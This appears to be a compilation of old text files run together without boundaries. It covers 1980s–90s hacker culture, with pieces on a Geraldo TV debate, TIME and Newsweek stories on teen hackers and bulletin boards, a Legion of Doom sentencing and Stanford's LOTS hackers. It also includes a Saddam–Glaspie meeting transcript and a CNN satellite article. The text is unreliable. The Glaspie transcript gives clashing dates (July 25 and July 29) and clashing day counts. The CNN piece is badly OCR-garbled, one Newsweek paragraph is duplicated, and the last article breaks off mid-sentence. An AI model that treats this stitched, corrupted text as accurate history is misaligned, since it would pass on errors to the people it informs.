Don:  I don't think they're being punished very much at all.  We're
having trouble even taking away their gear.  I don't know one of them
has done hard time in a prison.  The book, Hafner's book on
_Cyberpunk_, points out that even Mitnick who is a real electronic
Hannibal Lecter ... did not get near any of the punishment that what
he was doing entitled him to.

Geraldo: <laughing>  An electronic Hannibal Lecter.  OK, stand by,
we'll be back with more of this debate in a moment...

<Commercials>

Geraldo:  Back with Craig Neidorf and prosecutor Don Ingraham.  Craig,
do you think hackers are voyeurs or are they potentially terrorists?

KL:  I think they resemble voyeurs more than terrorists.  They are
often times looking at places where they don't belong, but most
hackers do not intend to cause any damage.

Geraldo:  Do you buy that Don?

Don:  If they stopped at voyeurism they would be basically
sociopathic, but not doing near the harm they do now.  But they don't
stop at looking, that's the point.  They take things out and share
them with others, and they are not being accountable and being
responsible as to whom they are sharing this information.  That is the
risk.

Geraldo:  Can they find out my credit rating?  I know that's not a
national security issue, but I'm concerned about it.

Don:  Piece of cake.

Geraldo:  No problem.

Don:  Assuming....

Geraldo:  Go ahead.  Assuming I have a credit rating...hahahah....

Don:  Assume that the credit is not carried by someone who is using
adequate security.

Geraldo:  But you think Craig it's not problem.

KL: I think it's no problem.

Geraldo:  Give me quickly the worst case scenario.  Say Abu Nidal had
you working for him.

KL:  I'm sorry?

Geraldo: Abu Nidal, notorious .....

KL:  As far as your credit rating?

Geraldo:  No, not as far as my credit rating..  The world, national
security.

KL:  Well, hackers have gotten into computer systems owned by the
government before.  At this point they've never acknowledged that it
was anything that was ever classified.  But even some unclassified
information could be used to the detriment of our country.

Geraldo:  Like the counter-terrorist strategy on January 15th, the day
of the deadline expired in the Persian Gulf.

KL: Perhaps if Saddam Hussein had somehow known for sure that we were
going to launch an attack, it might have benefited him in some way,
but I'm really not sure.

Geraldo:  Don, worst case scenario, 30 seconds?

Don:  They wipe out our communications system.  Rather easily done.
Nobody talks to anyone else, nothing moves, patients don't get their
medicine.  We're on our knees.

Geraldo:  What do you think of Craig, quickly, and people like him?

Don:  What do I think of Craig?  I have a lot of respect for Craig, I
think he's probably going to be an outstanding lawyer someday.  But he
is contributing to a disease, and a lack of understanding ethically,
that is causing a lot of trouble.

Geraldo:  One word answer. As the computer proliferate won't hackers
also proliferate?  Won't there be more and more people like you to
deal with?

Knight Lightning:  I think we're seeing a new breed of hacker.  And
some of them will be malicious.

Geraldo:  Some of them will be malicious.  Yes, well, that's it...for
now.  I'm Geraldo Rivera.

                           [End of Program]
Saddam-Glaspie meeting

Transcript of Meeting Between Iraqi President, Saddam Hussein and
U.S. Ambassador to Iraq, April Glaspie. - July 25, 1990 (Eight days before the
August 2, 1990 Iraqi Invasion of Kuwait).

July 25, 1990 - Presidential Palace - Baghdad

U.S. Ambassador Glaspie - 

I have direct instructions from President Bush to improve our
relations with Iraq.  We have considerable sympathy for your quest for higher
oil prices, the immediate cause of your confrontation with Kuwait. (pause) As
you know, I lived here for years and admire your extraordinary efforts to
rebuild your country.  We know you need funds.  We understand that, and our
opinion is that you should have the opportunity to rebuild your country.
(pause) We can see that you have deployed massive numbers of troops in the
south.  Normally that would be none of our business, but when this happens
in the context of your threats against Kuwait, then it would be reasonable for
us to be concerned.  For this reason, I have received an instruction to ask
you, in the spirit of friendship - not confrontation - regarding your
intentions: Why are your troops massed so very close to Kuwait's borders?



Saddam Hussein -

As you know, for years now I have made every effort to reach a
settlement on our dispute with Kuwait.  There is to be a meeting in two days;
I am prepared to give negotiations only this one more brief chance. (pause)
When we (the Iraqis) meet (with the Kuwaitis) and we see there is hope,
then nothing will happen.  But if we are unable to find a solution, then it will
be natural that Iraq will not accept death.



U.S. Ambassador Glaspie - 

What solutions would be acceptable?



Saddam Hussein -

If we could keep the whole of the Shatt al Arab - our strategic goal in
our war with Iran - we will make concessions (to the Kuwaitis). But, if we are
forced to choose between keeping half of the Shatt and the whole of Iraq
(i.e., in Saddams view, including Kuwait) then we will give up all of the Shatt
to defend our claims on Kuwait to keep the whole of Iraq in the shape we
wish it to be. (pause) What is the United States' opinion on this?



U.S. Ambassador Glaspie -

We have no opinion on your Arab - Arab conflicts, such as your dispute
with Kuwait.  Secretary (of State James) Baker has directed me to emphasize
the instruction, first given to Iraq in the 1960's, that the Kuwait issue is not
associated with America. (Saddam smiles)



On August 2, 1990 four days later, Saddam's massed troops invade and
occupy Kuwait.



*******************************************************



Baghdad, September 2, 1990, U.S. Embassy



One month later, British journalist obtain the the above tape and
transcript of the Saddam - Glaspie meeting of July 29, 1990.  Astounded,
they confront Ms. Glaspie as she leaves the U.S. Embassy in Baghdad.



Journalist 1 -

Are the transcripts (holding them up) correct, Madam Ambassador?

(Ambassador Glaspie does not respond)



Journalist 2 -

You knew Saddam was going to invade (Kuwait) but you didn't warn
him not to.  You didn't tell him America would defend Kuwait.  You told him
the opposite - that America was not associated with Kuwait.



Journalist 1 -

You encouraged this aggression - his invasion. What were you
thinking?



U.S. Ambassador Glaspie -

Obviously, I didn't think, and nobody else did, that the Iraqis were
going to take all of Kuwait.



Journalist 1 -

You thought he was just going to take some of it?  But, how could you? 
Saddam told you that, if negotiations failed, he would give up his Iran (Shatt
al Arab waterway) goal for the Whole of Iraq, in the shape we wish it to be.
You know that includes Kuwait, which the Iraqis have always viewed as an
historic part of their country!



Journalist 1 -

American green-lighted the invasion.  At a minimum, you admit
signaling Saddam that some aggression was okay - that the U.S. would not
oppose a grab of the al-Rumeilah oil field, the disputed border strip and the
Gulf Islands (including Bubiyan) - the territories claimed by Iraq?



(Ambassador Glaspie says nothing as a limousine door closed behind her and 
the car drives off.)

                                       
		   (*> The Great Satellite Caper <*)
	(*> Reprinted without permission from TIME Magazine <*)
			(*> Typed by ZiGGY <*)
	Hacker's arrests point up the growing problem of system security

  It started innocuously enough:  a credit card costomer in Conneticutt opened
his monthly statement and noticed a charge for a peice of electronic equipment
that he had never purchased.  By last week that apparent billing error had
blossomed int a full-fledged hacker scandal and led to the arrest of seven New
Jersey teenagers who were charged with conspiracy and using their home
computers and telephone hookups to commit computer theft.

  According to police, who confiscated $30,000 worth of computer equipment and
hundreds of floppy disks, the youths had exchanged stolen credit card numbers,
bypasses long-distance telephone fees, traded supposedly secret fone numbers
(including those of Pentagon [Gasp!] officials), and published instructions on
how to build a letter bomb.  But most remarkable of all, the first reports
said, the youngsters had even managed to shift the orbit of one or more
comunication satellites.  That feat, the New York Post decided, was worth a
front page head line:  WHIZ KIDS ZAP U.S.  SATELLITES.

  It was the latest real-life version of War Games, in which an ingenious
teenager penetrates a sensitive military computer system and nearly sets off
World War III.	Two years sgo, for instance, the story was re-enacted by the
so-called 414 Gang, a group of Milwaukee-area youths who managed to break into
various computer systems all over the US.

  The new Jersey episode assumed heroic proportions when Middlesex County
Prosecuter Alan Rockoff that the youths, in addition to carrying on other
mischief, had been "Changing the positions of the satellites up in the blue
heavens." That achievment, if true, could have disrupted the telefone an telex
communications on two continents.  Officials from AT&T and Comsat hastily
denied that anything of the sort had taken place.  In fact, the computers that
control the satelites cannot be reached by the lines of public fones.  By
week's end the prosecuter's office was quietly backing away from its most
startling assertion, but to most Americans, the satellite caper remained real,
a dramatic reminder for a bright youngster steeped inthe secret arts of the
computer age, anything is possible.  Says Stephen Levey, author of Hackers:
"It's an immensley seductive myth, that a kid with a computer can bring a
powerful institution to it's knees."

  Last spring postal authorities traced the Conneticut credit card purchase and
a string of other fraudulent transactions to a post office box in Soutn
Plainfield New Jersey.	Someone was using the box to take delivery of sterio
and radar-detection equipment ordered through a computerized mail order
catalog.  The trail led to a young New jersey enthusiast who used the alias
"New Jersey Hack Sack" and communicated regularly with other computer owners in
a loosley organized network of electronic bulletin boards.  A computer search
of the contents of those boards by detective GEORGE GREEN and patrolman MICHAEL
GRENNIER, who is something of a hacker himself, yeilded a flood of gossip,
advice, tall tales, and hard information, including excerpts from an AT&T
satellite manual, dozens of secret telephone numbers, and lists of stolen
credit card numbers.

  The odd mix was not unique to the suspect bulliten boards.  Explains DONN
PARKER, a computer crime expert at SRI International in Menlo Park, California:
"Hacking is a meritocracy.  You rise in the culture depending on the
information you can supply to other hackers.  It's like trading bubble gum
cards." ( <- Whatta ass!)

  Some of the information posted by the New Jersey hackers may have been
gleaned by cracking supposedly secure systems.	Other data, like the access
numbers of remote computers, were probably gatheres automatically by so called
"demon dialers", programs that search the phone system for online computers by
dialing every number within an area code.  "In some cases penetrating a
computer system is extremely difficult and requires a great deal of knowledge
and luck" says PARKER.  "In others it's as simple as dialing into a bulletin
board and finding the passwords that other kids have left." And sometimes it's
even simpler than that.  Two of the New Jersey youths admitted that at least
one of the credit card numbers they used had not come from a computer but from
a slip of carbon paper retreived from a trash can.

  No matter how mundane, the actions of the New jersey hackers have again
focused national attention on a real and growing problem:  how to safeguard the
information that is stored inside of computers.  Americans now carry more than
600 million credit and charge cards, many of them allowing at least partial
access to a computerized banking system that moves over $400 billion every day.
Corporate data blanks hold consumer records and business plans worth untold
billions more.

  Alerted to the threat by earlier break-ins, corporations and government
agencies have been moving to shore up their systems.  Many have issued multiple
layers of password protection, imposing strict dicipline on the security of
passwords and requiring users to change their passwords frequently.  Others
have installed scrambling devices that encode sensitive data before they are
sent over the wires.  Audit trails make crime detection easier by keeping
permanent record of who did what within a system.  Dialback services help keep
out unauthorized users by recording each callers ID number, disconnecting the
call and then re-dialing only that telefone number authorized to the holder of
the ID.

  All told, U.S.  business spent $600 million on security equipment and
software.  By 1993, according to DataPro research, security systems should
exceed $2 billion annually.  in addition to the cost, these measures tend to
make the systems less "friendly," in the jargon of the trade.  But computer
operators who keep their systems casual may be courting trouble.  Says SRI's
PARKER:  "These are sush reasonable, cost-effective steps that managers who
don't use them pretty much deserve what they get."

Historians and politicians continue to debate who
won the Gulf War, but anyone glued round-the-
clock to their TV set will tell you the v-inner vvas
CNN. With its live, raw, and riveting coverage, Ted
Turner's 24-hour Cable News Network became the
information source for an international audience that
included everyone from competing news organizations
to Saddam Hussein.
For many of its live visual reports, CNN relied on on~
of its four mobile satellite communications systems,
also called transportable earth stations, or "flyaways."
The flyaways accept signals from standard video cam-
eras and include video and audio processing equip-
ment, a dish antenna for transmitting the signals via
satellite, alld amplifiers for powering the system.
~lobile satellite technology has been in use at CNN

since 1984, according to Dick Tauber,
director of satellites and circuits for
CNN. But the recent de~Telopment of
more compact earth stations, with
smaller antennas that broadcast on th~
higher-frequency Ku-band rather than
C-band, has increased the systems'
mobility and has cut the amount of
time it takes news crews to set up and
link up with a satellite. What once too]
nearly a day now takes a few hours,
he said.
"The C-band transportable earth sta-
tions took up a lot of cargo space - you
needed a large truck, an 18-wheeler,

because of the great big antenna," Tauber said.
With Ku-band flyaway systems, antenna sizes have
shrunk to about six to eight feet, compared with the
more than 100 feet needed for C-band communications.
The 13 components of the S-l Flyaway weigh less than
100 pounds each and fit into crates approved by the
Federal Aviation Administration.
FAA approval is a major selling point for the technol-
ogy - instead of sending the flyaways as freight using
cargo services, "we can ship the vv-hole thing as excess
baggage on a commercial flight," Tauber said. "NOVV
everything hits the ground at the same time: crew,
reporters and a dozen or two boxes."
The flyaways sell for between $200,000 to $340,000
and are approved by the Washington, D.C.-based
International Telecommunications Organization

(Intelsat), a 25-year-old cooperative of more than 120
member countries who ovvn and operate a global com-
munications satellite system. "It's the concept of the
global village," said Arnold .~leyers, manager of broad-
cast services for Intelsat. "If anything happens in a
country, there's more interest in seeing pictures live. "
During the Gulf War and the tense period preceding
it, CNN found itself competing with news organizations
that also had deployed earth stations for live broadcasts.
It had to move quickly to contract for satellite access
time with the Iraqi, E~uwaiti and Saudi Arabian govern-
ment ministries responsible for handling Intelsat com-
munications services - a logistical nightmare Tauber
described in one word: "Maalox."
Today, three of CNN's flyaways are based in Atlanta
and a fourth is stationed in London. "Before the war,

there vvere 30 to 40 licensed transportable flyaways
around the world," Tauber said. "But by the time the
vvar was over, there were 130."
Along with the flyaways, CNN has been issuing
portable satellite phones to its news teams, Tauber said.
With these phones, CNN reporters and crews in the
field are virtually guaranteed an open channel of com-
munication with more than l 5 foreign bureaus and
CNN's Atlanta headquarters.
But no matter how successful its satellite communi-
cations solutions have been, CNN continues to explore
even better ways to provide live coverage from news
scenes around the vvorld. Tauber's group is watching
the development of new digital video technologies,
including video compression, that will make it possible
to send live video over the telephone.
One of the most promising of these technologies is
Motion Picture Experts Group (MPEG), a video and
audio compression standard expected to be finalized
later this year. C-Cube Microsystems, a San Jose, Calif.-
based compression systems developer, and Bell Atlantic
have already demonstrated a prototype MPEG-based
system capable of transmitting high-quality video from
a central video file server to subscriber homes via stan-
dard copper telephone lines.
Tauber believes it will be three to five years before
digital video technology will be cost-effective and
capable of handling the netv--ork's broadcast-quality
requirements. But he's not worried about the wait.
"Time flies when you're doing bench tests," he
said with a laugh. - - -



         "As you are surveying a dark and misty swamp you come across
        what appears to be a small cave.  You light a torch and enter.
         You have walked several hundred feet when you stumble into a
         bright blue portal...with a sudden burst of light and a loud
         explosion you are swept into...DragonFire...  Press any key,
                               if you dare..."

                              __________________
                             |    red menace    |
                             |       -&-        |
                             | mephisto madware |
                             | textfile systems |
                             |     present:     |
                              ~~~~~~~~~~~~~~~~~~
                [#][#][#][#][#][#][#][#][#][#][#][#][#][#][#]
                [#]                                       [#]
                [#]         "Night of the Hackers"        [#]
                [#]           by Richard Sandza           [#]
                [#]  From "Newsweek" November 12th, 1984  [#]
                [#]                                       [#]
                [#][#][#][#][#][#][#][#][#][#][#][#][#][#][#]

                   Edited from a badly-done version to this
                   lovely one (HAH!) by the one, the only,
                                   Mr. Pez.
                                (What a guy.)

    You have programmed your personal computer to dial into Dragonfire, a
computer bulletin board in Gainsville, Texas.  But before you get any
information, Dragonfire demands your name, home city, and phone number.  So,
for tonight's tour of the electronic wilderness you become "Montana Wildhack"
of San Francisco.

      Dragonfire, Sherwood Forrest(sic), Forbidden Zone, Blottoland,
Plovernet, The Vault, Shadowland, PhBI, and scores of other computer bulletin
boards are hangouts of a new generation of vandals.  These precocious teen
agers use their electronic skills to play hide and seek with computer and
telephone security forces.  Many computer bulletin boards are completely
legitimate: they resemble electronic versions of the familiar cork boards in
supermarkets and school corridors, listing services and providing imformation
some one out there is bound to find useful.  But this is a walk on the wild
side, a trip into the world of underground computer bulletin boards dedicated
to encouraging -- and making -- mischief.  The phone numbers for these boards
are closely guarded as a psychiatrist's home telephone number.  Some numbers
are posted on underground boards, others are exchanged over the telephone.  A
friendly hacker provided Dragonfire's number.  Hook up and you see a choice
of topics offered.  For phone phreaks -- who delight in stealing service from
AT&T and other phone networks -- Phreakenstein's Lair is a potpourri of phone
numbers, access codes, and technical information.  For computer hackers --
who dial into other people's computers -- Ranger's Lodge is chock-full of
numbers and passwords for government, university, and corporate computers.

      Moving through Dragonfire's offerings, you can only marvel at how
conversant these teen-agers are with the technical esoterica of today's
electronic age.  Obviously,they have spent a great deal of time studying
computers, though their grammar and spelling indicate they haven't been as
diligent in other subjects.  You are constantly reminded of how young they
are.  "Well, it's that time of year again.  School is back in session so
let's get those high school phone numbers rolling in.  Time to get straight
A's, have perfect attendance (except when you've been up all night hacking
school passwords), and messing up your worst teacher's paycheck."

    Moving through Dragonfire's offerings, you can only marvel at how
conversant these teen-agers are with the technical esoterica of today's
electronic age.  Obviously,they have spent a great deal of time studying
computers, though their grammar and spelling indicate they haven't been as
diligent in other subjects.  You are constantly reminded of how young they
are.  "Well, it's that time of year again.  School is back in session so
let's get those high school phone numbers rolling in.  Time to get straight
A's, have perfect attendance (except when you've been up all night hacking
school passwords), and messing up your worst teacher's paycheck."

    Forbidden Zone, in Detroit, is offering ammunition for a hacker civil war
...tips on crashing the most popular bulletin board software.  There are also
plans for building red, black, and blue boxes to mimic operator tones and get
free service.  And here are the details for "the safest and best way to make
and use nitroglycerin," compliments of Dr. Hex, who says he got it from "my
chemistry teacher."

    Flip through the "pages."  You have to wonder if this information is
accurate.  Can this really be the phone number and password to Taco Bell's
computer?  Do these kids really have the dialup numbers to dozens of
universtiy computers?  The temptation is too much.  You sign off and have
your computer dial the number to Yale University Computer.  Bingo -- the
words Yale University appear on your screen.  You enter a password.  A menu
appears.  You hang up in a sweat.  You are now a hacker.

    Punch in another number and your modem zips off touch tones.  Here comes
the tedious side of all this.  Bulletin boards are popular.  No vacancy at
Bates Motel (named for Anthony Perkins' creepy motel in the movie "Psycho");
the line is busy.  So are 221 B. Baker Street, PhBI, Shadowland, and The
Vault.  Caesar's Palace rings and connects.  This is a different breed of
board.  Caesar's palace is a combination phreak board and computer store in
Miami.  This is the place to learn ways to mess up a department store's
antishoplifting system, or make free calls on telephones with locks on the
dials.  Pure capitalism accompanies such anarchy.  Caesar's Palace is
offering good deals on disk drives, software, computers, and all sorts of
hardware.  Orders are taken through electronic mail messages.

    "Tele Trial":  Bored by Caesar's Palace, you enter the number to
Blottoland, the board operated by one of the nation's most notorious computer
phreaks -- King Blotto.  This one had been busy all night, but it is pretty
late in Cleveland.  The phone rings and you connect.  To get past the blank
screen, type the secondary password, "S-L-I-M-E."  King Blotto obliges,
listing his rules: you must leave your real name, telephone number, address,
occupation and interests.  He will call and disclose the primary password,
"if you belong on this board."  If admitted, do not reveal the phone number
or the secondary password, lest you face "Tele-Trial," the King warns and
dismisses you by hanging up.

    You expexted heavy security,but this teen-ager's security is, as they
say, awesome.  Computers at the defense department and hundreds of businesses
let you know when you've reached them.  Here you need a password just to find
out what system answered the phone.  Then King Blotto asks questions, and
hangs up.  Professional security experts could learn something from this kid.
He knows that ever since the 414 computer hackers were arrested in August
1982, law enforcement officers have been searching for leads on bulletin
boards.

    "Do you have any ties to or connections with any law enforcement agency
or any agency which would inform such a law inforcement agency of this
bulletin board?"

    Such is the welcomig message to Plovernet, a Florida board known for its
great hacker/phreak files.  There amid a string of valid Visa/MasterCard
numbers are dozens of computer phone numbers and passwords.  Here, you also
learn what Blotto means by tele trial.  "As some of you may or may not know,
a session of the conference court was held and The Wizard was found guilty of
miscellaneous charges, and sentenced to four months off bulletin boards."  If
The Wizard calls, system operators like Blotto will disconnect him.

    Paging through the bulletin boards is a test of your patience.  Each
board has different commands to follow, leaving you to hunt and peck your way
around.  So far you haven't had the nerve to type "C" which summons the
system operator for a live, computer to computer conversation.

    The time, however, has come for you to ask a few questions to the
"sysop".  You dial a computer in boston.  It answers & you begin working
through the menus.  You scan through a handful of dial-up numbers, including
one for Arpanet, the Defense Department's research computer.  You bravely tap
"C", and in seconds, the screeen blanks and your cursor dances across the
screen.

 "Hello...  What kind of computer do you have?"

 Contact.  The sysop is here.  You exchange amenities and get "talking."  How
much hacking does he do?  Not much, too busy.  Is he afraid of having his
computer confiscated like the Los Angeles man facing criminal charges because
his computer bulletin board contained a stolen telephone credit card number?
"No," he replies.  Finally, he asks the dreaded question, "How old are you?"
"How old are you?" you reply, stalling.  "15." he types.  Once you confess
that you are old enough to be his father, the conversation gets very serious.
You fear each new question.  He probably thinks you're a cop.  But all he
wants to know is your choice for President.  The chat continues, until he
asks you what time it is.  Just past midnight, you reply.  Expletive, "it's
3:08 here," sysop types, "I must be going to sleep.  I've got school
tomorrow." The cursor dances.  "*********** Thank you for calling."  The
screen goes blank.

             Richard Sandza


The News Line] 3 FROM "LEGION OF DOOM" SENTENCED

  (Nov. 17)
  Twenty-year-old Robert J. Riggs of Decatur, Ga., has been sentenced to a
21-month prison term on federal charges of breaking into a nine-state 911
emergency network and passing access codes to other computerists.
  Two associates -- Franklin E. Darden Jr., 23, of Norcross, Ga., and Adam E.
Grant, 22, of Atlanta -- were handed 14-month prison terms, seven of which can
be served in a halfway house.
  The three were alleged members of the underground "Legion of Doom" computing
group. As reported earlier, Riggs and Darden pleaded guilty to one count of
conspiracy each and faced up to five years in prison and a $250,000 fine. Grant
pleaded guilty to possessing 15 or more BellSouth access devices with intent to
defraud and could have received 10 years in prison and a $250,000 fine.
  Reporting from Atlanta, The Associated Press says US District Judge Owen
Forrester ordered the three to serve probation and perform community service
after they serve their prison time.
  As noted, Riggs was charged with breaking into the Atlanta-based BellSouth
Corp's 911 network covering Georgia, Alabama, Mississippi, Tennessee, Kentucky,
Louisiana, North Carolina, South Carolina and Florida. The intrusion, which
occurred between September 1987 & July 1989, did not disrupt service. A stolen
computer program was published in an electronic newsletter.
  Darden's lawyer, Michael Hauptman, told the court yesterday his client "was
involved in a quest for knowledge. Frank was addicted to this world of computer
doors ... put before him."
  Judge Forrester ordered Riggs to surrender to begin his sentence no earlier
than Feb. 15, while Darden and Grant were told to report Jan. 4.
  Meanwhile, a threatened attack on phone networks by computer vandals in
response to the sentence apparently did not materialize. As reported yesterday,
sources told AP that phone companies around the country were taking special
precautions because of rumors of a possible attack.
  --Charles Bowen
          >> A Beautiful obsession with the binary world <<
                         >> By Steven Levy <<

				She can kill all your files;
				She can freeze with a frown.
				And a wave of her hand brings the
				  whole system down.
				And she works on her code until ten
				  after three.
				She lives like a bat but she's always a
				  hacker to me.

				               - from the LOTS
						 Hacker songbook



THE LOW OVERHEAD Time-Sharing (LOTS) facility at Stanford University
is blanketed with an eerie calm. There are more than a hundred
students here, but they speak in whispers, as though they were in the
presence of something godlike. The cavernous main lobby, which reaches
up to a fourth-floor skylight (the building is the architectural soul
mate of the recently collapsed Kansas City Hyatt), holds a lounge in
which a dozen or so students are scattered, some pacing impatiently,
others snoozing, their heads resting on textbooks.  The names of these
students are on a computer queue; they are waiting for a free computer
terminal at the north end of the lobby, where each of perhaps fifty
cubicles is equipped with a keyboard and display screen.  Staring at
each of these terminals is a Stanford student, or someone posing as a
Stanford student in order to use the computer. In an adjoing room,
there are approximately sixty more terminals, also in use.  The hushed
voices give the occasional beeps of the computer an odd prominence,
and you can often hear the methodical, somewhat screechy churn of the
computer's printer in the other room.  But most of the noise is lost
because of the enormity of the lobby.  To the ear, this is an
electronic cathedral.
	It's well past midnight.
	Most of the students are under the whip of academic
discipline.  Siting in a rather formal posture, they tentatively key
in data and watch for the results on the display screen with skeptical
frowns.  They often consult their books before making another move.
These are the users.  For them, computers are functional, if over
complex, tools:  necessary evils.
	But to a small society that convenes here at LOTS, computers
are much more.  The big, orange-topped, million-dollar DECSYSTEM-20
(DEC-20) computer, visible behind a glass partition, looks no more
spectacular than a line of file cabinets, but it is the dominant icon
of these devotees' existence, the secret sharer of their dreams, their
instrument of power and creativity, their medium of communication,
their companion in merrymaking.  This is the society of hackers.
	Hackers are the mutant offspring of the eggheads who once
prowled throught engineering buildings with slide rules attached to
their belts.  The computer's power has made the hackers a subculture
to be reckoned with.  Their fellow students may consider them creepy,
but among themselves they are risk takers, exploreres, artists.  They
communicate with one another by intricate computer networks, speak in
their own jargon and qualify for lucrative jobs in which they will
create the complex programs essential for the everyday functioning of
our nation, our world.  They have the potential to be supercriminals,
to use digital skeleton keys to electronic vaults holding money,
confidential personal data and national security secrets.  But the
power is not without a price:  an addiction to computing, a conpulsion
to program.  And they think it's fun.
	I leave Newell to his PCL. There are about forty people still
using the computer. Each seems to be a self-sufficient system of man
and machine. It is almost four a.m.--the hour of the hacker.

"WITHIN THE NEXT twenty years, culture will be divided between those
who know something about the computer and those who don't. It's like
knowing how to read when the printing press was invented," says James
Milojkovic, a Stanford psychologist working toward a doctorate.
Milojkovic, a cheery Australian who studies "psychological issues in
computer interaction," has been watching hackers closely. He thinks
it's essential that we study them. "They are looked upon as sick and
strange; they see themselves as doing what everyone will be doing in
the future.  There's a real mystery to them, because they know things
that we don't.  They believe they have total control of what's going
on, because when you understand what the computer does, you can have
it do almost anything. Once you learn how, you're part of the
priesthood. It's a priesthood of the young. I've heard stories of
elementary school kids breaking into schools at night so they can use
the computer."
	Ernest Adams never figured to be a hacker. True, he like
computing, which he'd been doing since he was twelve; then he
experienced his first epiphany: "Here I was typing things, and the
machine was typing things back at me, and we're imagining we're
playing a space war!" Adams had a natural talent for computers, but he
thought he got it all out of his system in high school, when he hung
out with a group who would stay late tapping into the computer at the
nearby University of Kentucky. He came to Stanford to major in
physics--until sometime in his first quarter, when he wandered into
LOTS.
	Low Overhead Time-Sharing began at Stanford five years ago as
a twenty-four-hour self-service operation designed to encourage
student computer use. It was too successful. "The first student
coordinator dropped out of school because he got to involved with the
computer," says LOTS programmer J.Q. Johnson, "and several more got
pretty close."
	The Stanford community has witnessed previous generations of
hackers, mostly in the Artificial Intelligence Lab. But that group was
unique and pioneering. LOTS hackers are indicative of a new wave
haunting computing centers in colleges throughout the country. In many
cases, these new hackers, like Adams, have been raised on computers.
They have little experience with anything but computers. They often
don't care to learn about anything else. They associate only with
other hackers, speaking in the own strange jargon, always complaining
about some "bagbiting kluge," whistling in awe over some "winner's
cuspy, yet nontrivial" program. These words are delivered in a
high-pitched, goofy burst of verbiage that assumes the listener is
inputting data as quickly as a PDP-11. Uninformed non-hackers (called
users, often modified to lusers) have a word for these creatures:
nerd. But their attitude is also touched with a trace of envy, since
hackers know something the users don't.
	Five weeks away from home, Ernest Adams was unhappy. He
disliked dorm life. He was also suffering thorugh the tortuous throes
of unrequited love known only to seventeen-year-old males. Physics was
not going to solve his problems, so he came to LOTS. He sat down at a
terminal, opened an account, and for the next few hours, had a long
talk with the computer about its operating system. He'd found a
friend.
	"I became involved with LOTS to the exclusion of other
things," Ernest says. "I would come to drown my sorrows." His
expertise grew, and his programming ideas became grandiose. You could
do anything with a program. As Ralph Gorin, the director of LOTS, puts
it: "Who else do you know who will do whatever you tell it to?" Adams
has his own explanation: "It's knowing you can start from scratch,
create an object called a program, hand it to the computer and have
the computer start plotting beautiful graphs across the screen--and
you are personally responsible!" He smiles demonically beneath his
beard. "It's a little like playing God."
	The world that Adams has entered is based entirely on the
computer.  In this world, participants are asked to choose a new name,
and they often identify themselves with such fantasy monikers as
Gandalf or Bombadil.  With its multimillion-character memory, the
DEC-20 is sort of a home, an office, a babysitter and a best friend.
It will handle the most elaborate programs you can conceive of.  It
will play chekcers and robot war with you, and it will remind you,
with an accompanying bell, when it's time for dinner.  <Somewhere in
the computer memory is a list of pizzerias that deliver.> It will tell
you when your friends have logged into the system, and allow you to
send messages to them without leaving your terminal.  It will
entertain you with lewd limericks stored in its core.  It will type
your paper for you, help you with homework and, with its electronic
bulletin board, help you sell your roller skates.  If you get
restless, you can go exploring in the nooks and crannies of the
DEC-20's labyrinthine operating system, looking for stray bugs.
	The computer generates a closely knit community of disciples.
Hackers hang out with fellow hackers, meeting one another in
late-night sessions where they may crowd around the terminal of
someone who is preparing a hack that will, upon reaching "winnitude,"
be placed in the computer's operating system.  On six a.m. excursions
to breakfast, the talk is of the machine's new PASCAL language
compiler, or the upcoming trade of a program written at SCORE (another
computer facility at Stanford) for a digital electronic memory cache.
Violent arguments erupt over the relative virtues of LISP programming
language and PCL.  The arguments are fought in the weird, coldly
logical syntax that comes from working in the rigid linear protocol of
programming.
	Though some hackers won't socialize at all, most love to talk
computers.  On slight provocation they will overwhelm users with
arcanely detailed explanations of computer protocol.  But inevitably,
they return to their terminals.  Only rarely does the hacker community
gather together for special occasions, such as the recent fifth
anniversary of LOTS, when hackers faced the glass window of the
computer room and sang "Happy Birthday" to the DEC-20.  Otherwise, the
most social moments at LOTS come toward the end of each quarter, when
the lobby is packed with students waiting their turns at the computer.
Those waiting for terminals swill beer to the accompaniment of a
guitar-toting crooner singing hacker lyrics to the tunes of popular
songs.  Sing-along selections include "Fifty Ways to Write Your
Program," "LOTS Is Painless," "I Wonder How the System Is Doing
Tonight," "I Don't Know How to Log In" and "Fun Fun Fun Till Her Daddy
Took the Keyboard Away."
	To understand what hackers really >do< when they sit at
terminals until rough stubble emerges on their chins, you must
understand something about high-level computer programming.  You must
also set aside suspicions that computers are vile, impersonal
manipulators of numbers, and enemies of individuality.  To hackers,
programming is the mental equivalent of supersonic test piloting, and
the computer is a bottomless font of spirituality.
	A program is a set of instructions to the computer.  It
consists of lines of code usually written in a specific language that
the computer, equipped with suitable microprocessing translators, can
understand.  By telling the computer how to rearrange and access its
binary contents, each program allows the computer to perform a set of
functions, and the results might be anything from a Space Invaders
game to a mailing list.
	A program must be scrupulously constructed to perform its
function.  Former IBM software manager Frederick Brooks wrote in "The
Mythical Man-Month": "If one character, one pause of the incantation
is not in stricly proper form, the magic doesn't work."  But even
after it seems to work, there might be bugs in the program that will
affect performance.  A maniacal perfectionism is called for in
debugging.  While it may seem workaday, hackers think otherwise."
	"Debugging is like laying a long railroad track," says John
Levy, a software manager for Apple Computers.  "There's a little piece
you want to test, so you back up the locomotive five miles down the
road and at ninety miles an hour, you bring it across the track yo're
testing.  If everyting is perfect, it flies right over, but if there's
one flaw, the engine rools off, flying and crashing until it comes to
rest a mile down the track.  Only at that point do you get to see the
pieces."
	The ones who take the greatest programming challenges, who
fearlessly construct miles of fragile track and race the hugest
engines acrosss them, are hackers.  Just as the early astronauts
achieved legendary status, there is a hacker elite whose wizardry has
set them apart as digital daredevils.
	Don Woods is acknowledged to have the Right Stuff.  With long,
stringy black hair and a bearish grin, he looks somewhat older than
his twenty-nine years.  He works at Xerox and wears a dark GAMES
T-shirt that contrasts with his almost chalk-colored skin.  Pinned
next to the Xerox employee badge on his shirt is a button that reads
QUESTION AUTHORITY.  Wood is known as a classic, or canonical, hacker.
"Here's a quick hack I've been working on," he says.  He types a few
characters on his keyboard, and from the computer come the
calliopelike sounds of a rousing, Sousa-style marching song.  "I put
it together in a couple of days," he says.
	One of the results of Woods' epic hacks is Adventure, a
collaboration with Will Crowther.  Ostensibly a game, Adventure is a
metaphor for hacking.  When you begin Adventure, the computer tells
you your location: at a stream, near a forest, within sight of a small
brick building.  From there you embark on a Tolkeinesque journey
through the caverns and glens of a medieval land, encountering
murderous midgets, poisonous snakes, treacherous rapids, thieving
pirates and magazines written in dwarf language.  By telling the
computer the direction you wish to move (typeing N for north or U for
up, for example), the computer calculates where, on the unseen map
created in Woods' imaginations, you will wind up next, and displays a
